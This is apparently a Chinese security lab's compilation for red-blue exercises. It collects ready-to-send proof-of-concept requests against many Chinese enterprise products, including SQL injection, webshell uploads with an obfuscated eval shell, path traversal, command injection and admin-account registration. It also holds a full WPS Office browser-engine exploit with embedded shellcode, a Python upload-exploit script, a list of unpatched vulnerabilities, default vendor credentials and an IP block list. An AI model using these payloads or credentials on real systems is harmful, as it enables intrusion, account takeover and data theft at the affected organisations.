打完hw想玩ctf的可以看看polarctf.com
建议各位使用wps的用户及时去更新官网最新版本 poc已经增加
有最新漏洞等相关消息实时会同步在文档中,
各家厂家默认密码汇总和建议封禁ip在文末。
证语实验室分为两大组成部分 证语问安做安全渗透 证语听证做电子取证
通达OA
sql注入漏洞CVE-2023-4165 POC
GET /general/system/seal_manage/iweboffice/delete_seal.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20fr om%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Ac cept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2AcceptEncoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1 1 GET /general/system/seal_manage/dianju/delete_log.php? DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20f
泛微OA
泛微 OA 代码执行 EXP
描述和影响范围
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。
Weaver E-Office9.0
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
–25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85–
–25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name=“file”; filename=“”
Content-Type: application/octet-stream
–25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85–
泛微 Weaver E-Office9 前台文件包含
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_…/…/attachment/xxx.xls
网神系列
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=“submit_post”
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name=“hash”
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc–
木马路径:attachements/xxx.php
网神 SecSSL 3600安全接入网关系统 任意密码修改
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={“this_name”:“test”,“subAuthId”:“1”}
old_pass=&password=Test123!@&repassword=Test123!@
深信服系列
深信服 应用交付命令执行
POST /rep/login
Host:URL
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
深信服报表 任意读取
GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
绿盟系列
绿盟sas安全审计系统任意文件读取漏洞
/webconf/GetFile/indexpath=…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd
绿盟 SAS堡垒机 Exec 远程命令执行漏洞
/webconf/Exec/index?cmd=要执行的命令
广联达产品
广联达后台文件上传
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie:
Connection: close
Content-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
广联达OA SQL
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
通达
CVE-2023-4166
本次范围:通达OA版本11.10之前
post请求包
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.232.137:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1
金山办公
WPS 命令执行
wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
代码块在底下。(需要原pdf联系博主)
<script>
if(typeof alert === "undefined"){
alert = console.log;
}
let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);
function d2u(v) {
f64[0] = v;
return u32;
}
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
function gc(){ // major
for (let i = 0; i < 0x10; i++) {
new Array(0x100000);
}
}
function foo(bug) {
function C(z) {
Error.prepareStackTrace = function(t, B) {
return B[z].getThis();
};
let p = Error().stack;
Error.prepareStackTrace = null;
return p;
}
function J() {}
var optim = false;
var opt = new Function(
'a', 'b', 'c',
'if(typeof a===\'number\'){if(a>2){for(var
i=0;i<100;i++);return;}b.d(a,b,1);return}' +
'g++;'.repeat(70));
var e = null;
J.prototype.d = new Function(
'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
J.prototype.a = new Function('a', 'a.b(0,a)');
J.prototype.b = new Function(
'a', 'b',
'b.c();if(a){' +
'g++;'.repeat(70) + '}');
J.prototype.c = function() {
if (optim) {
var z = C(3);
var p = C(3);
z[0] = 0;
e = {M: z, C: p};
}
};
var a = new J();
// jit optim
if (bug) {
for (var V = 0; 1E4 > V; V++) {
opt(0 == V % 4 ? 1 : 4, a, 1);
}
}
optim = true;
opt(1, a, 1);
return e;
}
e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];
let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");
let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);
let obj_array = {
m: 1337, target: gc
};
let ab = new ArrayBuffer(1337);
let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 0xa72) {
object_idx = i;
object_idx_flag = 1;
break;
}if (d2u(oob_array[i])[1] === 0xa72) {
object_idx = i + 1;
object_idx_flag = 0;
break;
}
}
function addrof(obj_para) {
obj_array.target = obj_para;
let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
obj_array.target = gc;
return addr;
}
function fakeobj(addr) {
let r8 = d2u(oob_array[object_idx]);
if (object_idx_flag === 0) {
oob_array[object_idx] = u2d(addr, r8[1]);
}else {
oob_array[object_idx] = u2d(r8[0], addr);
}
return obj_array.target;
}
let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 1337) {
bk_idx = i;
bk_idx_flag = 1;
break;
}if (d2u(oob_array[i])[1] === 1337) {
bk_idx = i + 1;
bk_idx_flag = 0;
break;
}
}
let dv = new DataView(ab);
function get_32(addr) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
let val = dv.getUint32(0, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
return val;
}
function set_32(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint32(0, val, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
}
function write8(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint8(0, val);
}
let fake_length = get_32(addrof(oob_array)+12);
set_32(get_32(addrof(oob_array)+8)+4,fake_length);
let wasm_code = new
Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,
128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,
128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0
,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is"+rwx_mem.toString(16));
const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,
0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,
0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,
0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,
0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,
0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,
0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,
0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,
0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,
0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
0x00]);
for(let i=0;i<shellcode.length;i++){
write8(rwx_mem+i,shellcode[i]);
}
f();
</script>
海康威视
HIKVISION iSecure Center综合安防管理平台文件上传
在底下
#!usr/bin/env python
# *-* coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理,方便burpsuit抓包
}
def run(arg):
try:
flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9))
filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))
vuln_url=arg+"center/api/files;.js"
headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept': '*/*',
'Content-Type': 'application/x-www-form-urlencoded'}
file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
if r.status_code==200 and "webapps/clusterMgr" in r.text:
payload=f"clusterMgr/{filename}.txt;.js"
url=arg+payload
r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
if r2.status_code==200 and flag in r2.text:
print('\033[1;31;40m')
print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}")
print('\033[0m')
else:
print(arg+":不存在漏洞")
except:
print(arg+":不存在漏洞")
if __name__ == '__main__':
url=sys.argv[1]
run(url)
POST请求包
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream
9YPQ3I3ZS
蓝凌OA
前台代码执行
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
这个删了吧,古老的很
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
这玩意老洞了
安恒
安恒明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>
汉得SRM tomcat.jsp 登录绕过漏洞 POC
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin’and(se lect*from(select+sleep(3))a)=’
分别访问后 直接访问后台。
然后访问后台:/main.screen
辰信景云终端安全管理系统 login SQL注入漏洞 POC
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
用友 移动管理系统 uploadApk.do 任意文件上传漏洞
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO 3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server Connection: close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3 Content-Disposition:form-data;name="downloadpath"; filename="a.jsp" Content-Type: application/msword
hello ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
nday消息同步
1海康威视综合安防前台文件上传漏洞
这个洞厂商修复有些问题,还是可以通过…跳转到根目录,换个接口而已
2.蓝凌OA前台代码执行漏洞
蓝凌V131415就不说了,去年代码执行、金格接口打得很凶,今年蓝凌有了大更新之后还是存在很多RCE问题
3.致远M3Server-xxxx反序列化漏洞
懂得都懂
4.致远A8V8SP1SP2文件上传漏洞(1dav)
1day,今年年初修复了很多,ajaxdo接口ajaxAction涉及的文件操作方法还是很多的
5.普元EOS
前台代码执行漏洞,这系统代码执行也太多了不赘述,建议重开6泛微F-coloav后合文件上传漏洞(0dav
从数据库读xxx,然后写到根目录,除了一些流
传的1day之外泛微可以说基本已安全,RASP能
绕也不想耗费精力继续看了,这个洞是针对去年
的前台洞绕过。
7泛微E-Mobile任意用户登录(1day)
Emobile很难做后续利用,不过如果存在信息泄露风险的可以关注下8泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞,office9洞太多用的少没必要写了
9契约锁电子签章系统RCE(1day)
上海某行动期间已修复,更新补丁很快,这家签章平台响应速度还是很快的,和泛微ECO经常同框打包卖
10.亿赛通电子文档平台文件上传漏洞市面上的上传1day其实去年补丁都打完了,今年有新的,可以注意下
11.ldocview命令执行漏洞
去年项目挖的,今年还在12jeesite代码执行漏洞Oday,丁真来了都得说真13LiveBOS文件上传漏洞
金融单位供应链,不需要前几年的跳目录了,新
版本灵动框架的上传绕过绕的很emmm
14.用友nc-cloud-任意文件写入(Oday
NCCLOUD今年用过大部分都没修
15.一哥VPN
预计今年二进制漏洞打得也会很凶,端口PWN!
16.xxIOA PWN
零信任不一定真的安全
17.xxx准入PWN
弱口令记得也要修一修
18.深信服应用交付系统命令执行
19.协同办公文档(DzzOfffice)未授权访问
20.电子签章平台代码执行漏洞
21泛微oa进后台漏洞
22.ucloud的未授权获取任意用户cookie
23.飞书客户端RCE漏洞
24.泛微EofficeV10前台RCE
25.来客推商城任意文件上传
26天明堡垒机Oday
27明御运维审计与风险控制系统堡垒机任意用户注册28协同管理系统存在SQL注入29泛微emobile注入漏洞
30.拓尔思WCM任意命令执行漏洞
31.用友财务云任意文件上传漏洞
各厂家产品默认密码汇总
天融信防火墙 用户名:superman 密码:talent
天融信防火墙 用户名:superman 密码:talent!23
联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766
深信服防火墙 用户名:admin 密码:admin
启明星辰 用户名:admin 密码:bane@7766 用户名:admin 密码:admin@123
juniper 用户名:netscreen 密码:netscreen
Cisco 用户名:admin 密码:cisco
Huawei 用户名:admin 密码:Admin@123
H3C 用户名:admin 密码:admin
绿盟IPS 用户名: weboper 密码: weboper
网神防火墙GE1 用户名:admin 密码:firewall
深信服VPN:51111端口 密码:delanrecover
华为VPN:账号:root 密码:mduadmin
华为防火墙:admin 密码:Admin@123
EudemonJuniper防火墙:netscreen netscreen
迪普 192.168.0.1 默认的用户名和密码(admin/admin_default)
山石 192.168.1.1 默认的管理账号为hillstone,密码为hillstone
安恒的明御防火墙 admin/adminadmin
某堡垒机 shterm/shterm
天融信的vpn test/123456
致远OA
system用户(默认密码:system,对应A8的系统管理员、A6的单位管理员)
group-admin(默认密码:123456,对应A8集团版的集团管理员)
admin1(默认密码:123456,对应A8企业版的单位管理员)
audit-admin(默认密码:123456,对应审计管理员)
泛微OA
用户名:sysadmin 密码:1
安全设备
常见安全设备
天融信防火墙 用户名:superman 密码:talent
天融信防火墙 用户名:superman 密码:talent!23
联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766
深信服防火墙 用户名:admin 密码:admin
启明星辰 用户名:admin 密码:bane@7766 用户名:admin 密码:admin@123
juniper 用户名:netscreen 密码:netscreen
Cisco 用户名:admin 密码:cisco
Huawei 用户名:admin 密码:Admin@123
H3C 用户名:admin 密码:admin
绿XXXIPS 用户名: weboper 密码: weboper
网神防火墙GE1 用户名:admin 密码:firewall
深信服VPN:51111端口 密码:delanrecover
华为VPN:账号:root 密码:mduadmin
华为超融合:admin 密码:Huawei12#$
华为防火墙:admin 密码:Admin@123
华为
EudemonJuniper防火墙:netscreen netscreen
迪普 192.168.0.1 默认的用户名和密码(admin/admin_default)
山石 192.168.1.1 默认的管理账号为hillstone,密码为hillstone
安恒的明御防火墙 admin/adminadmin
某堡垒机 shterm/shterm
天融信的vpn test/123456
阿姆瑞特防火墙admin/manager
明御WEB应用防火墙admin/admin
明御安全网关admin/adminadmin
天清汗马admin/veuns.fw audit/veuns.audit
网康日志中心ns25000/ns25000
网络安全审计系统(中科新业)admin/123456
LogBase日志管理综合审计系统admin/safetybase
中新金盾硬件防火墙admin/123
kill防火墙(冠群金辰)admin/sys123
黑盾防火墙admin/admin
XXX蒙安全产品
IPS入侵防御系统、SASH运维安全管理系统、SAS安全审计系统、DAS数据库审计系统、RSAS远程安全评估系统、WAF WEB应用防护系统、UTS威胁检测系统
sysauditor/sysauditor
sysmanager/sysmanager
supervisor/supervisor
maintainer/maintainer
webpolicy/webpolicy
sysadmin/sysadmin
conadmin/conadmin
supervis/supervis
webaudit/webaudit
sysadmin/sysadmin
conadmin/nsfocus
weboper/weboper
auditor/auditor
weboper/weboper
nsadmin/nsadmin
admin/nsfocus
admin/admin
shell/shell
默认密码在线查询网站
https://CIRT.net https://cirt.net/passwords
默认密码列表
https://datarecovery.com/rd/default-passwords/
工具猫路由器默认密码查询
https://toolmao.com/baiduapp/routerpwd/
建议封禁的风险IP地址
收集去重集合的风险IP地址 来源于情报社区和其他情报群。
建议各位发现有相关的威胁行为情况下,即使封禁地址处理。
在表格中 CTRL+A可以全选表格中的内容复制里面的内容
121.40.127.235 长亭牧云主机助手回连IP地址
203.56.198.50 扫描器扫描
36.139.90.88 扫描器扫描
111.30.232.239 扫描器扫描
49.232.193.91 扫描器扫描
61.52.4.110 扫描器扫描
175.27.157.249 扫描器扫描
162.14.108.149 扫描器扫描
61.52.1.187 扫描器扫描
8.130.114.73 扫描器扫描
101.43.131.124 扫描器扫描
82.156.151.104 扫描器扫描
42.192.83.35 扫描器扫描
36.139.93.155 扫描器扫描
119.45.116.236 扫描器扫描
118.195.135.88 端口扫描
39.104.200.136 端口扫描
123.56.94.91 端口扫描
115.159.112.166 端口扫描
39.100.74.7 端口扫描
47.92.204.74 端口扫描
39.104.205.225 端口扫描
47.106.193.231 端口扫描
202.114.144.106 端口扫描
61.171.119.106 端口扫描
39.100.68.7 端口扫描
39.104.205.76 端口扫描
47.99.153.172 端口扫描
39.100.69.32 端口扫描
39.100.67.40 端口扫描
39.100.66.92 端口扫描
39.100.67.4 端口扫描
39.100.71.240 端口扫描
47.92.199.215 端口扫描
1.13.9.165 端口扫描
114.132.55.109 端口扫描
39.100.67.168 端口扫描
103.252.118.75 端口扫描
117.176.227.58 多种漏洞利用
171.15.105.211 多种漏洞利用
182.92.222.186 多种漏洞利用
182.92.171.153 多种漏洞利用
101.200.121.243 多种漏洞利用
47.94.230.88 多种漏洞利用
42.229.37.94 多种漏洞利用
39.107.123.197 多种漏洞利用
61.181.206.56 多种漏洞利用
47.92.146.232 恶意云主机
180.103.125.43 恶意云主机
42.194.251.210 恶意云主机
47.92.193.104 恶意云主机
39.100.68.20 恶意云主机
39.100.74.176 恶意云主机
39.105.189.100 恶意云主机
49.234.66.241 恶意云主机
112.126.83.111 恶意云主机
47.92.222.215 恶意云主机
39.107.244.18 恶意云主机
39.98.253.124 恶意云主机
118.195.252.229 恶意云主机
101.200.127.65 恶意云主机
119.91.30.216 恶意云主机
39.104.22.163 恶意云主机
39.104.205.209 恶意云主机
118.195.163.139 恶意云主机
118.195.151.253 恶意云主机
118.178.233.247 恶意云主机
39.100.33.106 恶意云主机
47.92.153.182 恶意云主机
118.195.241.144 恶意云主机
106.55.107.106 恶意云主机
81.69.18.228 恶意云主机
47.92.117.144 恶意云主机
39.98.71.2 恶意云主机
39.98.207.132 恶意云主机
119.45.197.199 恶意云主机
39.100.65.171 恶意云主机
122.230.40.42 恶意IP
156.255.214.146 恶意IP
115.55.5.252 恶意IP
36.27.112.227 恶意IP
128.90.186.63 恶意IP
49.81.101.133 恶意IP
39.144.230.42 恶意IP
121.76.146.145 恶意IP
115.227.53.220 恶意IP
36.63.124.161 恶意IP
139.214.148.34 恶意IP
218.83.6.211 恶意IP
106.58.246.138 恶意IP
42.236.134.110 恶意IP
220.201.59.247 恶意IP
114.253.103.147 恶意IP
27.202.246.112 恶意IP
42.228.100.149 恶意IP
103.225.84.43 恶意IP
61.147.96.34 恶意IP
219.156.23.174 恶意IP
43.154.112.206 恶意IP
125.83.104.172 恶意IP
180.123.199.17 恶意IP
180.125.235.203 恶意IP
112.248.113.169 恶意IP
113.252.145.146 恶意IP
119.162.122.131 恶意IP
111.201.175.156 恶意IP
182.121.198.156 恶意IP
43.137.9.153 恶意IP
182.114.24.127 恶意IP
125.109.150.118 恶意IP
122.142.195.43 恶意IP
112.248.244.57 恶意IP
180.97.189.166 恶意IP
183.27.124.95 恶意IP
59.175.107.34 恶意IP
58.153.134.157 恶意IP
183.157.44.76 恶意IP
61.54.61.238 恶意IP
111.67.58.35 恶意IP
42.238.153.5 恶意IP
42.239.10.26 恶意IP
124.131.32.11 恶意IP
42.3.201.56 恶意IP
182.127.191.82 恶意IP
115.57.30.175 恶意IP
223.74.158.84 恶意IP
183.27.118.73 恶意IP
106.57.165.109 恶意IP
219.155.86.248 恶意IP
122.140.203.113 恶意IP
220.187.194.231 恶意IP
221.1.226.158 恶意IP
60.246.68.18 恶意IP
119.139.137.132 恶意IP
182.121.53.223 恶意IP
115.171.206.56 恶意IP
123.118.11.71 恶意IP
123.235.145.137 恶意IP
115.60.49.192 恶意IP
180.123.198.188 恶意IP
180.97.189.153 恶意IP
